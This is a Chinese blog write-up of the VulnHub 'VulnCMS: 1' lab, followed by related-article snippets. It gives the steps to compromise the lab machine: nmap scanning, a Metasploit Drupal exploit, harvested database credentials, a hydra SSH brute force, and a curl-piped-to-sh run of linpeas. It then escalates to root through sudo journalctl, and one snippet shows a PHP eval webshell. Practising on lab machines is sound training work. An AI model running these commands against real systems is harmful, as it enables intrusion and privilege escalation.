vulnhub之 VulnCMS: 1

最新推荐文章于 2024-01-10 22:47:53 发布
最新推荐文章于 2024-01-10 22:47:53 发布
阅读量683 收藏 2
点赞数 3
分类专栏: 网络安全 文章标签: mysql 系统安全 ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/119462923
版权

                                                      VulnCMS: 1

信息搜集

首先进行ip扫描

看看开启了哪些端口

对端口进行扫描

 nmap -sC -sV -p 22,5000,80,8081,9001 192.168.181.146 --min-rate=2000

获取shell

在端口协议上进行扫描发现三个 WordPress 5.7.2 Joomla drupal,于是在msf上进行查看

我尝试了第八个,可是不行

 

于是我来测试最后一个

 search drupal

好像可以

输入shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

首先查看所有的wordpress

find / -type d -name  "wordpress" 2>/dev/null

于是在/html/wordpress/public_html 发现了wordpress数据库的用户名密码

find / -type d -name  "joomla" 2>/dev/null

于是找到了joomla数据库的用户名密码

我在查看INSTALL.sqlite.txt他告诉我了 drupal的用户名密码所在位置

于是我在/VAR/WWW//html/drupal/sites/default发现了用户名

 这是所有数据库的用户名和密码

                         user

                           passwd

drupal_admin

p@$$_C!rUP@!_cM5

joomla_admin

j00m1_@_dBpA$$

wp_admin

UUs3R_C!B@p@55

于是进入到数据库

对其进行解密,无效

在查看joomla数据库中的email特别像密码

在home目录下有三个用户

于是进行暴力破解 (用户名放在user.txt 密码放在passwd.txt)

hydra -L user.txt  -P passwd.txt   ssh://192.168.181.146

于是获得了用户名密码,进行ssh登录

登录成功

于是获得第一个flag

由于我无法查看其他目录,要重新定位

python3 -c 'import os; os.system("/bin/bash");'

提权

发现elliot用户无法提权

于是对tyrell进行密码破解,首先运行/linpeas.sh 输出为1.txt

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh > 1.txt(要开加速器)

获得了用户名密码,进行ssh登录

sudo -l 提示/bin/journalctl进行提权

sudo journalctl

!/bin/sh

获得最终flag

 

我带的我们
关注
专栏目录
渗透靶场——Vulnhub:VulnCMS
tlovejr的博客
04-08 4968
前言 前几天一直在做HackMyVM系列靶场,今天正常看到了一个Vulnhub系列靶场,这个靶场里面是有3个cms漏洞,所以就那来做做看 1、主机存活探测 arp-scan -l 2、端口扫描 nmap -A -p- -T4 192.168.1.7 在这里会发现一共有3个模块端口,分别是5000端口的wordpress模板、8001端口的Joomla模板、9001端口的Drupal模板,针对这几个cms漏洞,那就直接对症下药,对应的模板用对应的工具去扫描 3、漏洞扫描 对于wordpress模板来
VULNCMS: 1靶机
logan_logan的博客
07-19 442
1.端口扫描 nmap -A -T4 -p- 10.36.101.128 2.Drupal 7 CMS漏洞利用 nmap总共扫描出三个CMS,最后经过测试Drupal7可以利用; 在这里使用MSF进行利用; 可以成功建立会话,在/var/www/html/drupal/misc这个目录下找到一个tyrell.pass文件; 查看这个文件之后,得到用户tyrell的登录密码; 3.使用tyrell用户SSH登录; 登录成功之后使用sudo -l命令发现/bin/journalctl可以进行
Vulnhun_VULNCMS: 1
qq_45434762的博客
06-26 555
主机信息kali:192.168.1.12 VULNCMS: 1:192.168.1.6 信息收集使用netdiscover发现目标主机netdiscover -r 192.168.1.0...
vulnhub渗透测试VulnCMS
weixin_44687621的博客
08-25 351
靶机地址:http://www.vulnhub.com/entry/vulncms-1,710/ 扫描虚拟机网卡网段,获得靶机ip地址。 看看靶机开放的服务,这里详细说一下命令参数 -sS SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快,效率高 -sV 版本检测,用来扫描目标主机和端口上运行的软件的版本 -T5 T0-T2:串行扫描 T3-T5:并行扫描 -A 启用操作系统和版本检测,脚本扫描和路由跟踪功能 可以看到上面开放了四个web服务,分别是:单独的nginx、wordp
Vulnhub-vulncms
lionwerson的博客
02-22 2296
Vulnhub-vulncms nmap扫描端口: 开放5000端口,8081端口,9001端口。 80端口: 5000端口(wordpress): 8081端口(joomla): 9001端口(drupal): drupal7版本存在一个rce,exploit: #!/usr/bin/env python3 import requests import argparse from bs4 import BeautifulSoup def get_args(): parser = arg
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)
m0_68117643的博客
08-01 1872
该靶机(stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
Vulnhub-VULNCMS: 1渗透
最新发布
laoyanCZ的博客
01-10 1247
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
校赛VulnCMS
qq_43774856的博客
11-30 538
校赛VulnCMS 打开链接得到一个网页。 找到了两处可以读取任意文件的地方。 根据登陆界面 http://202.119.201.199:9002/member/index/login 猜测存在后台管理界面访问http://202.119.201.199:9002/admin/index/login ,猜测账号密码都为admin,进入管理员界面后,如图所示。 发现输入命令的地方。 > echo '<?php @eval($_POST["fe1w0"]);phpinfo();?&gt
VulnHub-dc-1靶机渗透测试
MzHeader的博客
11-02 545
0x00 前言 在开始之前我们需要先配置一下环境,因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,我这里是桥接。 0x01 探测目标 kali:192.168.199.241 首先,我们先来探测一下目标机器的IP,这里有很多种方法,着重讲一下其中2种方法。 (1)运行arp-scan识别目标的IP地址 使用arp-scan -l命令探测同一区域中存活主机。 (2)使...
简单了解cms,复现vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1064
简单了解cms,复现vulhub中的wordpress漏洞
靶机渗透练习11-VulnCMS (三个国外著名cms)
Force~
04-03 6402
靶机地址: https://www.vulnhub.com/entry/vulncms-1,710/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -sn 192..
靶机渗透练习09-VulnCMS
hirak0的博客
04-15 2054
靶机描述 靶机地址:https://www.vulnhub.com/entry/vulncms-1,710/ Description This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag. Hint: Proc
vulhub靶机--lazysysadmin
m0_58595840的博客
01-18 307
vulhub渗透共享文件夹
WEB漏洞攻防 - 文件上传漏洞 - 中间件类应用场景 - [VULHUB 靶机]Weblogic任意文件上传漏洞[CVE-2018-2894]
易编橙 · 终身成长社群,相遇已是上上签!
09-03 555
思考:在实际应用场景中,常规类的文件上传、CMS类的文件上传、编辑器的上传或者CTF比赛中的文件上传应用场景都有不同的差异;总结下来就是,文件上传不管是发现还是利用上都会根据产生层面而不同,常规类无资料的情况下采用常规思路测试,有资料的情况下直接参考资料进行即可。 同样的在一些中间件中也有文件上传功能,也会出现文件上传的漏洞。所以说我们在发现文件上传还是利用上面,都和该漏洞存在的层面有关。比如前面提到的 PHPCMS 是网站程序层面,Ueditor 是网站插件层面,而现在我们马上接触的 Weblogic.
(20)文件上传漏洞:原理、原因、常见触发点分析,vulhub、upload、公开cms上传漏洞多种方法测试
热门推荐
03-08 1万+
在一步一步试错中进行上传漏洞的多种方法测试,让实践最真实
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值